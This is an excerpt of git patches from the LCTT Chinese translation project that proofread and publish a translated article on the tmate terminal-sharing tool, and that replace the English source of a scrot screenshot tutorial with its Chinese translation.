-![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-1.png) 要注意的是,SSH 会话 ID 会在几秒后消失,不过不要紧,你可以通过下面命令获取到这些详细信息。 @@ -110,26 +108,29 @@ $ tmate $ tmate show-messages ``` -`tmate` 的 `show-messages` 命令会显示 tmate 的 log 信息,其中包含了 ssh 连接内容。 -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) +`tmate` 的 `show-messages` 命令会显示 tmate 的日志信息,其中包含了该 ssh 连接内容。 + +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-2.png) + +现在,分享你的 SSH 会话 ID 给你的朋友或同事从而允许他们观看终端会话。除了 SSH 会话 ID 以外,你也可以分享 web URL。 -现在,分享你的 SSH 会话 ID 给你的朋友或同事从而允许他们观看终端会话. 除了 SSH 会话 ID 以外,你也可以分享 web URL。 另外你还可以选择分享的是只读会话还是可读写会话。 ### 如何通过 SSH 连接会话 -只需要在终端上运行你从朋友那得到的 SSH 终端 ID 就行了. 类似下面这样。 +只需要在终端上运行你从朋友那得到的 SSH 终端 ID 就行了。类似下面这样。 ```shell $ ssh session: ssh 3KuRj95sEZRHkpPtc2y6jcokP@sg2.tmate.io ``` -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-4.png) ### 如何通过 Web URL 连接会话 -打开浏览器然后访问朋友给你的 URL 就行了. 像下面这样。 -![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) +打开浏览器然后访问朋友给你的 URL 就行了。像下面这样。 + +![](https://www.2daygeek.com/wp-content/uploads/2017/11/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds-3.png) 只需要输入 `exit` 就能退出会话了。 @@ -148,9 +149,9 @@ Connection to sg2.tmate.io closed。 via: https://www.2daygeek.com/tmate-instantly-share-your-terminal-session-to-anyone-in-seconds/ -作者:[ Magesh Maruthamuthu ][a] +作者:[Magesh Maruthamuthu][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 914f1be572cc9bbef6093c73c9edc984a6a2099c Mon Sep 17 00:00:00 2001 From: wxy Date: Thu, 30 Nov 2017 12:23:17 +0800 Subject: [PATCH 0086/1627] =?UTF-8?q?PUB:20171128=20tmate=20=E2=80=93=20In?= =?UTF-8?q?stantly=20Share=20Your=20Terminal=20Session=20To=20Anyone=20In?= =?UTF-8?q?=20Seconds.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @lujun9972 明天发布 --- ... Instantly Share Your Terminal Session To Anyone In Seconds.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md (100%) diff --git a/translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md b/published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md similarity index 100% rename from translated/tech/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md rename to published/20171128 tmate – Instantly Share Your Terminal Session To Anyone In Seconds.md From de57490d6e709d17f2786d60a9f967158857e663 Mon Sep 17 00:00:00 2001 From: zpl1025 Date: Thu, 30 Nov 2017 12:56:13 +0800 Subject: [PATCH 0087/1627] [translated] 20170215 How to take screenshots on Linux using Scrot --- ...o take screenshots on Linux using Scrot.md | 331 ------------------ ...o take screenshots on Linux using Scrot.md | 330 +++++++++++++++++ 2 files changed, 330 insertions(+), 331 deletions(-) delete mode 100644 sources/tech/20170215 How to take screenshots on Linux using Scrot.md create mode 100644 translated/tech/20170215 How to take screenshots on Linux using Scrot.md diff --git a/sources/tech/20170215 How to take screenshots on Linux using Scrot.md b/sources/tech/20170215 How to take screenshots on Linux using Scrot.md deleted file mode 100644 index 11d9ac5a95..0000000000 --- a/sources/tech/20170215 How to take screenshots on Linux using Scrot.md +++ /dev/null @@ -1,331 +0,0 @@ -zpl1025 -How to take screenshots on Linux using Scrot -============================================================ - -### On this page - -1. [About Scrot][12] -2. [Scrot Installation][13] -3. [Scrot Usage/Features][14] - 1. [Get the application version][1] - 2. [Capturing current window][2] - 3. [Selecting a window][3] - 4. [Include window border in screenshots][4] - 5. [Delay in taking screenshots][5] - 6. [Countdown before screenshot][6] - 7. [Image quality][7] - 8. [Generating thumbnails][8] - 9. [Join multiple displays shots][9] - 10. [Executing operations on saved images][10] - 11. [Special strings][11] -4. [Conclusion][15] - -Recently, we discussed about the [gnome-screenshot][17] utility, which is a good screen grabbing tool. But if you are looking for an even better command line utility for taking screenshots, then you must give Scrot a try. This tool has some extra features that are currently not available in gnome-screenshot. In this tutorial, we will explain Scrot using easy to understand examples. - -Please note that all the examples mentioned in this tutorial have been tested on Ubuntu 16.04 LTS, and the scrot version we have used is 0.8. - -### About Scrot - -[Scrot][18] (**SCR**eensh**OT**) is a screenshot capturing utility that uses the imlib2 library to acquire and save images. Developed by Tom Gilbert, it's written in C programming language and is licensed under the BSD License. - -### Scrot Installation - -The scrot tool may be pre-installed on your Ubuntu system, but if that's not the case, then you can install it using the following command: - -sudo apt-get install scrot - -Once the tool is installed, you can launch it by using the following command: - -scrot [options] [filename] - -**Note**: The parameters in [] are optional. - -### Scrot Usage/Features - -In this section, we will discuss how the Scrot tool can be used and what all features it provides. - -When the tool is run without any command line options, it captures the whole screen. - -[ - ![Using Scrot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/scrot.png) -][19] - -By default, the captured file is saved with a date-stamped filename in the current directory, although you can also explicitly specify the name of the captured image when the command is run. For example: - -scrot [image-name].png - -### Get the application version - -If you want, you can check the version of scrot using the -v command line option. - -scrot -v - -Here is an example: - -[ - ![Get scrot version](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/version.png) -][20] - -### Capturing current window - -Using the utility, you can limit the screenshot to the currently focused window. This feature can be accessed using the -u command line option. - -scrot -u - -For example, here's my desktop when I executed the above command on the command line: - -[ - ![capture window in scrot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/desktop.png) -][21] - -And here's the screenshot captured by scrot:  - -[ - ![Screenshot captured by scrot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/active.png) -][22] - -### Selecting a window - -The utility allows you to capture any window by clicking on it using the mouse. This feature can be accessed using the -s option. - -scrot -s - -For example, as you can see in the screenshot below, I have a screen with two terminal windows overlapping each other. On the top window, I run the aforementioned command. - -[ - ![select window](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/select1.png) -][23] - -Now suppose, I want to capture the bottom terminal window. For that, I will just click on that window once the command is executed - the command execution won't complete until you click somewhere on the screen. - -Here's the screenshot captured after clicking on that terminal: - -[ - ![window screenshot captured](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/select2.png) -][24] - -**Note**: As you can see in the above snapshot, whatever area the bottom window is covering has been captured, even if that includes an overlapping portion of the top window. - -### Include window border in screenshots - -The -u command line option we discussed earlier doesn't include the window border in screenshots. However, you can include the border of the window if you want. This feature can be accessed using the -b option (in conjunction with the -u option of course). - -scrot -ub - -Here is an example screenshot: - -[ - ![include window border in screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/border-new.png) -][25] - -**Note**: Including window border also adds some of the background area to the screenshot. - -### Delay in taking screenshots - -You can introduce a time delay while taking screenshots. For this, you have to assign a numeric value to the --delay or -d command line option. - -scrot --delay [NUM] - -scrot --delay 5 - -Here is an example: - -[ - ![delay taking screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/delay.png) -][26] - -In this case, scrot will wait for 5 seconds and then take the screenshot. - -### Countdown before screenshot - -The tool also allows you to display countdown while using delay option. This feature can be accessed using the -c command line option. - -scrot –delay [NUM] -c - -scrot -d 5 -c - -Here is an example screenshot: - -[ - ![example delayed screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/countdown.png) -][27] - -### Image quality - -Using the tool, you can adjust the quality of the screenshot image at the scale of 1-100\. High value means high size and low compression. Default value is 75, although effect differs depending on the file format chosen. - -This feature can be accessed using --quality or -q option, but you have to assign a numeric value to this option ranging from 1-100. - -scrot –quality [NUM] - -scrot –quality 10 - -Here is an example snapshot: - -[ - ![snapshot quality](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/img-quality.jpg) -][28] - -So you can see that the quality of the image degrades a lot as the -q option is assigned value closer to 1. - -### Generating thumbnails - -The scrot utility also allows you to generate thumbnail of the screenshot. This feature can be accessed using the --thumb option. This option requires a NUM value, which is basically the percentage of the original screenshot size. - -scrot --thumb NUM - -scrot --thumb 50 - -**Note**: The --thumb option makes sure that the screenshot is captured and saved in original size as well. - -For example, here is the original screenshot captured in my case: - -[ - ![Original screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/orig.png) -][29] - -And following is the thumbnail saved: - -[ - ![thumbnail of the screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/thmb.png) -][30] - -### Join multiple displays shots - -In case your machine has multiple displays attached to it, scrot allows you to grab and join screenshots of these displays. This feature can be accessed using the -m command line option.  - -scrot -m - -Here is an example snapshot: - -[ - ![Join screenshots](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/multiple.png) -][31] - -### Executing operations on saved images - -Using the tool, we can execute various operations on saved images - for example, open the screenshot in an image editor like gThumb. This feature can be accessed using the -e command line option. Here's an example: - -scrot abc.png -e ‘gthumb abc.png’ - -Here, gthumb is an image editor which will automatically launch after we run the command. - -Following is the snapshot of the command: - -[ - ![Execute commands on screenshots](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec1.png) -][32] - -And here is the output of the above command: - -[ - ![esample screenshot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec2.png) -][33] - -So you can see that the scrot command grabbed the screenshot and then launched the gThumb image editor with the captured image as argument. - -If you don’t specify a filename to your screenshot, then the snapshot will be saved with a date-stamped filename in your current directory - this, as we've already mentioned in the beginning, is the default behaviour of scrot. - -Here's an -e command line option example where scrot uses the default name for the screenshot:  - -scrot -e ‘gthumb $n’ - -[ - ![scrot running gthumb](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec3.png) -][34] - -It's worth mentioning that $n is a special string, which provides access to the screenshot name. For more details on special strings, head to the next section. - -### Special strings - -The -e (or the --exec ) and filename parameters can take format specifiers when used with scrot. There are two types of format specifiers. First type is characters preceded by ‘%’ that are used for date and time formats, while the second type is internal to scrot and are prefixed by ‘$’ - -Several specifiers which are recognised by the --exec and filename parameters are discussed below. - -**$f** – provides access to screenshot path (including filename). - -For example, - -scrot ashu.jpg -e ‘mv $f ~/Pictures/Scrot/ashish/’ - -Here is an example snapshot: - -[ - ![example](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/f.png) -][35] - -If you will not specify a filename, then scrot will by-default save the snapshot in a date stamped file format. This is the by-default date-stamped file format used in scrot : %yy-%mm-%dd-%hhmmss_$wx$h_scrot.png. - -**$n** – provides snapshot name. Here is an example snapshot: - -[ - ![scrot $n variable](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/n.png) -][36] - -**$s** – gives access to the size of screenshot. This feature, for example, can be accessed in the following way. - -scrot abc.jpg -e ‘echo $s’ - -Here is an example snapshot - -[ - ![scrot $s variable](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/s.png) -][37] - -Similarly, you can use the other special strings **$p**, **$w**, **$h**, **$t**, **$$** and **\n** that provide access to image pixel size, image width, image height, image format, $ symbol, and give access to new line respectively. You can, for example, use these strings in the way similar to the **$s** example we have discussed above. - -### Conclusion - -The utility is easy to install on Ubuntu systems, which is good for beginners. Scrot also provides some advanced features such as special strings that can be used in scripting by professionals. Needless to say, there is a slight learning curve associated in case you want to use them. - - ![](https://www.howtoforge.com/images/pdficon_small.png) - [vie][16] - --------------------------------------------------------------------------------- - -via: https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/ - -作者:[Himanshu Arora][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/ -[1]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#get-the-applicationnbspversion -[2]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#capturing-current-window -[3]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#selecting-a-window -[4]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#includenbspwindow-border-in-screenshots -[5]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#delay-in-taking-screenshots -[6]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#countdown-before-screenshot -[7]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#image-quality -[8]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#generating-thumbnails -[9]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#join-multiple-displays-shots -[10]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#executing-operations-on-saved-images -[11]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#special-strings -[12]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#about-scrot -[13]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#scrot-installation -[14]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#scrot-usagefeatures -[15]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#conclusion -[16]:https://www.howtoforge.com/subscription/ -[17]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/ -[18]:https://en.wikipedia.org/wiki/Scrot -[19]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/scrot.png -[20]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/version.png -[21]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/desktop.png -[22]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/active.png -[23]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/select1.png -[24]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/select2.png -[25]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/border-new.png -[26]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/delay.png -[27]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/countdown.png -[28]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/img-quality.jpg -[29]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/orig.png -[30]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/thmb.png -[31]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/multiple.png -[32]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec1.png -[33]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec2.png -[34]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec3.png -[35]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/f.png -[36]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/n.png -[37]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/s.png diff --git a/translated/tech/20170215 How to take screenshots on Linux using Scrot.md b/translated/tech/20170215 How to take screenshots on Linux using Scrot.md new file mode 100644 index 0000000000..1ddefb37eb --- /dev/null +++ b/translated/tech/20170215 How to take screenshots on Linux using Scrot.md @@ -0,0 +1,330 @@ +如何在 Linux 系统里用 Scrot 截屏 +============================================================ + +### 文章主要内容 + +1. [关于 Scrot][12] +2. [安装 Scrot][13] +3. [Scrot 的使用和特点][14] + 1. [获取程序版本][1] + 2. [抓取当前窗口][2] + 3. [抓取选定窗口][3] + 4. [在截屏时包含窗口边框][4] + 5. [延时截屏][5] + 6. [截屏前倒数][6] + 7. [图片质量][7] + 8. [生成缩略图][8] + 9. [拼接多显示器截屏][9] + 10. [在保存截图后执行操作][10] + 11. [特殊字符串][11] +4. [结论][15] + +最近,我们介绍过 [gnome-screenshot][17] 工具,这是一个很优秀的屏幕抓取工具。但如果你想找一个在命令行运行的更好用的截屏工具,你一定要试试 Scrot。这个工具有一些 gnome-screenshot 没有的独特功能。在这片文章里,我们会通过简单易懂的例子来详细介绍 Scrot。 + +请注意一下,这篇文章里的所有例子都在 Ubuntu 16.04 LTS 上测试过,我们用的 scrot 版本是 0.8。 + +### 关于 Scrot + +[Scrot][18] (**SCR**eensh**OT**) 是一个屏幕抓取工具,使用 imlib2 库来获取和保存图片。由 Tom Gilbert 用 C 语言开发完成,通过 BSD 协议授权。 + +### 安装 Scrot + +scort 工具可能在你的 Ubuntu 系统里预装了,不过如果没有的话,你可以用下面的命令安装: + +sudo apt-get install scrot + +安装完成后,你可以通过下面的命令来使用: + +scrot [options] [filename] + +**注意**:方括号里的参数是可选的。 + +### Scrot 的使用和特点 + +在这个小节里,我们会介绍如何使用 Scrot 工具,以及它的所有功能。 + +如果不带任何选项执行命令,它会抓取整个屏幕。 + +[ + ![使用 Scrot](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/scrot.png) +][19] + +默认情况下,抓取的截图会用带时间戳的文件名保存到当前目录下,不过你也可以在运行命令时指定截图文件名。比如: + +scrot [image-name].png + +### 获取程序版本 + +你想的话,可以用 -v 选项来查看 scrot 的版本。 + +scrot -v + +这是例子: + +[ + ![获取 scrot 版本](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/version.png) +][20] + +### 抓取当前窗口 + +这个工具可以限制抓取当前的焦点窗口。这个功能可以通过 -u 选项打开。 + +scrot -u + +例如,这是我在命令行执行上边命令时的桌面: + +[ + ![用 scrot 截取窗口](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/desktop.png) +][21] + +这是另一张用 scrot 抓取的截图: + +[ + ![用 scrot 抓取的图片](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/active.png) +][22] + +### 抓取选定窗口 + +这个工具还可以让你抓取任意用鼠标点击的窗口。这个功能可以用 -s 选项打开。 + +scrot -s + +例如,在下面的截图里你可以看到,我有两个互相重叠的终端窗口。我在上层的窗口里执行上面的命令。 + +[ + ![选择窗口](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/select1.png) +][23] + +现在假如我想抓取下层的终端窗口。这样我只要在执行命令后点击窗口就可以了 - 在你用鼠标点击之前,命令的执行不会结束。 + +这是我点击了下层终端窗口后的截图: + +[ + ![窗口截图](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/select2.png) +][24] + +**注意**:你可以在上面的截图里看到,下层终端窗口的整个显示区域都被抓去下来了,甚至包括了上层窗口的部分叠加内容。 + +### 在截屏时包含窗口边框 + +我们之前介绍的 -u 选项在截屏时不会包含窗口边框。不过,需要的话你也可以在截屏时包含窗口边框。这个功能可以通过 -b 选项打开(当然要和 -u 选项一起)。 + +scrot -ub + +下面是示例截图: + +[ + ![截屏时包含窗口边框](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/border-new.png) +][25] + +**注意**:截屏时包含窗口边框同时也会增加一点额外的背景。 + +### 延时截屏 + +你可以在开始截屏时增加一点延时。需要在 --delay 或 -d 选项后设定一个时间值参数。 + +scrot --delay [NUM] + +scrot --delay 5 + +例如: + +[ + ![延时截屏](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/delay.png) +][26] + +在这例子里,scrot 会等待 5 秒再截屏。 + +### 截屏前倒数 + +这个工具也可以在你使用延时功能后显示一个倒计时。这个功能可以通过 -c 选项打开。 + +scrot –delay [NUM] -c + +scrot -d 5 -c + +下面是示例截图: + +[ + ![延时截屏示例](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/countdown.png) +][27] + +### 图片质量 + +你可以使用这个工具来调整截图的图片质量,范围是 1-100 之间。较大的值意味着更大的文件大小以及更低的压缩率。默认值是 75,不过最终效果根据选择的文件类型也会有一些差异。 + +这个功能可以通过 --quality 或 -q 选项打开,但是你必须提供一个 1-100 之间的数值作为参数。 + +scrot –quality [NUM] + +scrot –quality 10 + +下面是示例截图: + +[ + ![截屏质量](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/img-quality.jpg) +][28] + +你可以看到,-q 选项的参数更靠近 1 让图片质量下降了很多。 + +### 生成缩略图 + +scort 工具还可以生成截屏的缩略图。这个功能可以通过 --thumb 选项打开。这个选项也需要一个 NUM 数值作为参数,基本上是指定原图大小的百分比。 + +scrot --thumb NUM + +scrot --thumb 50 + +**注意**:加上 --thumb 选项也会同时保存原始截图文件。 + +例如,下面是我测试的原始截图: + +[ + ![原始截图](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/orig.png) +][29] + +下面是保存的缩略图: + +[ + ![截图缩略图](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/thmb.png) +][30] + +### 拼接多显示器截屏 + +如果你的电脑接了多个显示设备,你可以用 scort 抓取并拼接这些显示设备的截图。这个功能可以通过 -m 选项打开。 + +scrot -m + +下面是示例截图: + +[ + ![拼接截屏](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/multiple.png) +][31] + +### 在保存截图后执行操作 + +使用这个工具,你可以在保存截图后执行各种操作 - 例如,用像 gThumb 这样的图片编辑器打开截图。这个功能可以通过 -e 选项打开。下面是例子: + +scrot abc.png -e ‘gthumb abc.png’ + +这个命令里的 gthumb 是一个图片编辑器,上面的命令在执行后会自动打开。 + +下面是命令的截图: + +[ + ![截屏后执行命令](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec1.png) +][32] + +这个是上面命令执行后的效果: + +[ + ![示例截图](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec2.png) +][33] + +你可以看到 scrot 抓取了屏幕截图,然后再启动了 gThumb 图片编辑器打开刚才保存的截图图片。 + +如果你截图时没有指定文件名,截图将会用带有时间戳的文件名保存到当前目录 - 这是 scrot 的默认设定,我们前面已经说过。 + +下面是一个使用默认名字并且加上 -e 选项来截图的例子: + +scrot -e ‘gthumb $n’ + +[ + ![scrot 截屏后运行 gthumb](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/exec3.png) +][34] + +有个地方要注意的是 $n 是一个特殊字符串,用来获取当前截图的文件名。关于特殊字符串的更多细节,请继续看下个小节。 + +### 特殊字符串 + +scrot 的 -e(或 --exec)选项和文件名参数可以使用格式说明符。有两种类型格式。第一种是以 '%' 加字母组成,用来表示日期和时间,第二种以 '$' 开头,scrot 内部使用。 + +下面介绍几个 --exec 和文件名参数接受的说明符。 + +**$f** – 让你可以使用截图的全路径(包括文件名)。 + +例如 + +scrot ashu.jpg -e ‘mv $f ~/Pictures/Scrot/ashish/’ + +下面是示例截图: + +[ + ![示例](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/f.png) +][35] + +如果你没有指定文件名,scrot 默认会用日期格式的文件名保存截图。这个是 scrot 的默认文件名格式:%yy-%mm-%dd-%hhmmss_$wx$h_scrot.png。 + +**$n** – 提供截图文件名。下面是示例截图: + +[ + ![scrot $n variable](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/n.png) +][36] + +**$s** – 获取截图的文件大小。这个功能可以像下面这样使用。 + +scrot abc.jpg -e ‘echo $s’ + +下面是示例截图: + +[ + ![scrot $s 变量](https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/s.png) +][37] + +类似的,你也可以使用其他格式字符串 **$p**, **$w**, **$h**, **$t**, **$$** 以及 **\n** 来分别获取图片像素大小,图像宽度,图像高度,图像格式,输入 $ 字符,以及换行。你可以像上面介绍的 **$s** 格式那样使用这些字符串。 + +### 结论 + +这个应用能轻松地安装在 Ubuntu 系统上,对初学者比较友好。scrot 也提供了一些高级功能,比如支持格式化字符串,方便专业用户用脚本处理。当然,如果你想用起来的话有一点轻微的学习曲线。 + + ![](https://www.howtoforge.com/images/pdficon_small.png) + [vie][16] + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/ + +作者:[Himanshu Arora][a] +译者:[zpl1025](https://github.com/zpl1025) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/ +[1]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#get-the-applicationnbspversion +[2]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#capturing-current-window +[3]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#selecting-a-window +[4]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#includenbspwindow-border-in-screenshots +[5]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#delay-in-taking-screenshots +[6]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#countdown-before-screenshot +[7]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#image-quality +[8]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#generating-thumbnails +[9]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#join-multiple-displays-shots +[10]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#executing-operations-on-saved-images +[11]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#special-strings +[12]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#about-scrot +[13]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#scrot-installation +[14]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#scrot-usagefeatures +[15]:https://www.howtoforge.com/tutorial/how-to-take-screenshots-in-linux-with-scrot/#conclusion +[16]:https://www.howtoforge.com/subscription/ +[17]:https://www.howtoforge.com/tutorial/taking-screenshots-in-linux-using-gnome-screenshot/ +[18]:https://en.wikipedia.org/wiki/Scrot +[19]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/scrot.png +[20]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/version.png +[21]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/desktop.png +[22]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/active.png +[23]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/select1.png +[24]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/select2.png +[25]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/border-new.png +[26]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/delay.png +[27]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/countdown.png +[28]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/img-quality.jpg +[29]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/orig.png +[30]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/thmb.png +[31]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/multiple.png +[32]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec1.png +[33]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec2.png +[34]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/exec3.png +[35]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/f.png +[36]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/n.png +[37]:https://www.howtoforge.com/images/how-to-take-screenshots-in-linux-with-scrot/big/s.png From b84b05cfdb83aca0c6e3d28da6e725156c5d2df9 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Thu, 30 Nov 2017 